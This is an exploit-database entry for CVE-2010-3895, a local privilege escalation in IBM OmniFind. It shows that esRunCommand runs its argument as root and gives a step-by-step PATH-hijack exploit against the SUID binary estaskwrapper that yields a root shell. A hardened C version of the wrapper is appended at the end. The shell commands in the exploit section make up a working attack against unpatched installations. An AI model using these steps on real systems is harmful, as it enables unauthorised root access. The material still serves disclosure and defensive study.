Fatih Kilic, 1337DAY-ID-14762
History: Nov 10, 2010 - 12:00 a.m.

IBM OmniFind Privilege Escalation Vulnerability

2010-11-10 00:00:00
Fatih Kilic
0day.today

Exploit for windows platform in category local exploits

===============================================
IBM OmniFind Privilege Escalation Vulnerability
===============================================

* Privilege escalation in two applications (CVE-2010-3895)
 
Root SUID bits are set for the applications »esRunCommand« and »estaskwrapper«.
 
-------------------------------------------------------------------------
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/estaskwrapper
-------------------------------------------------------------------------
 
 
»esRunCommand« takes one argument and runs it as root. See example below.
-------------------------------------------------------------------------
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
   
  joemueller@XXX:/opt/IBM/es/bin> ./esRunCommand id
  OUTPUT: cmd is id
  id
  uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------
 
 
 
The application »estaskwrapper« is meant to start the application »estasklight«.
The pseudo C code looks like this:
-------------------------------------------------------------------------
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    int main(int argc, char *argv[]) {
      int auth = 0;
      char *path;
      char *args[] = { "estasklight", NULL };
      /* ... */
      if (argc > 1 && strcmp(argv[1], "estasklight") == 0) {
        auth = 1;
        /* ... */
        path = getenv("ES_LIBRARY_PATH");   /* caller-controlled value */
        if (path) {
          setenv("LD_LIBRARY_PATH", path, 1);
          setenv("LIBPATH", path, 1);
          /* ... */
          if (auth) {
            /* relative name: execvp resolves it through the caller's PATH */
            execvp("estasklight", args);
          }
          /* ... */
        }
        /* ... */
      }
      /* ... */
      return 0;
    }
-------------------------------------------------------------------------
 
 
Explanation of the code:
 
»argv[1]« is the first command line argument; it is compared with the string
»estasklight«, and if they are equal the »auth« flag is set.
If the user has the environment variable »ES_LIBRARY_PATH« set, its value is
copied into two new environment variables, »LD_LIBRARY_PATH« and »LIBPATH«.
If the »auth« flag is set, the application »estasklight« is executed via
»execvp«, which looks the relative name up in the caller's »PATH« while the
process still runs with root privileges.
 
 
 
Exploit for running /bin/sh
-------------------------------------------------------------------------
joemueller@XXX:~> cp /bin/sh ~/bin/estasklight
joemueller@XXX:~> export ES_LIBRARY_PATH=/home/joemueller
joemueller@XXX:~> export PATH=/home/joemueller/bin:$PATH
joemueller@XXX:~> /opt/IBM/es/bin/estaskwrapper estasklight
XXX:~# id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------
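A hardened form of the wrapper logic, added here as an example and not IBM's code: it keeps the exact-argument check, replaces »execvp« with »execve« on an absolute path so the caller's »PATH« is never consulted, and builds the child's environment from constants instead of copying »ES_LIBRARY_PATH« into »LD_LIBRARY_PATH« and »LIBPATH«. The install locations /opt/IBM/es/bin/estasklight and /opt/IBM/es/lib are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Assumed install locations; fixed at build time, never read from the caller. */
#define ESTASKLIGHT_PATH "/opt/IBM/es/bin/estasklight"
#define ES_LIBDIR        "/opt/IBM/es/lib"

/* Real string comparison, and exactly one argument so nothing extra
   reaches the root-privileged child. Returns 1 when authorised. */
int wrapper_authorized(int argc, char *const argv[]) {
    return argc == 2 && argv[1] != NULL && strcmp(argv[1], "estasklight") == 0;
}

/* Build the child's environment from constants only. PATH, ES_LIBRARY_PATH,
   LD_LIBRARY_PATH and LIBPATH from the caller are all dropped, so the user
   can steer neither the program lookup nor the libraries it loads.
   Returns the number of entries written; envp[n] is set to NULL. */
int build_clean_env(char *envp[], int max) {
    static char ld[]   = "LD_LIBRARY_PATH=" ES_LIBDIR;
    static char lib[]  = "LIBPATH=" ES_LIBDIR;
    static char path[] = "PATH=/usr/bin:/bin";
    char *fixed[] = { ld, lib, path };
    int count = (int)(sizeof fixed / sizeof fixed[0]);
    int n = 0;
    while (n < count && n < max - 1) {
        envp[n] = fixed[n];
        n++;
    }
    envp[n] = NULL;
    return n;
}

int main(int argc, char *argv[]) {
    char *envp[8];
    char *args[] = { "estasklight", NULL };
    if (!wrapper_authorized(argc, argv)) {
        fprintf(stderr, "usage: estaskwrapper estasklight\n");
        return 1;
    }
    build_clean_env(envp, 8);
    /* execve with an absolute path: PATH is never consulted, and the
       environment is the fixed one built above rather than the caller's. */
    execve(ESTASKLIGHT_PATH, args, envp);
    perror("execve");   /* only reached if the exec itself failed */
    return 1;
}
```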



#  0day.today [2018-03-28]  #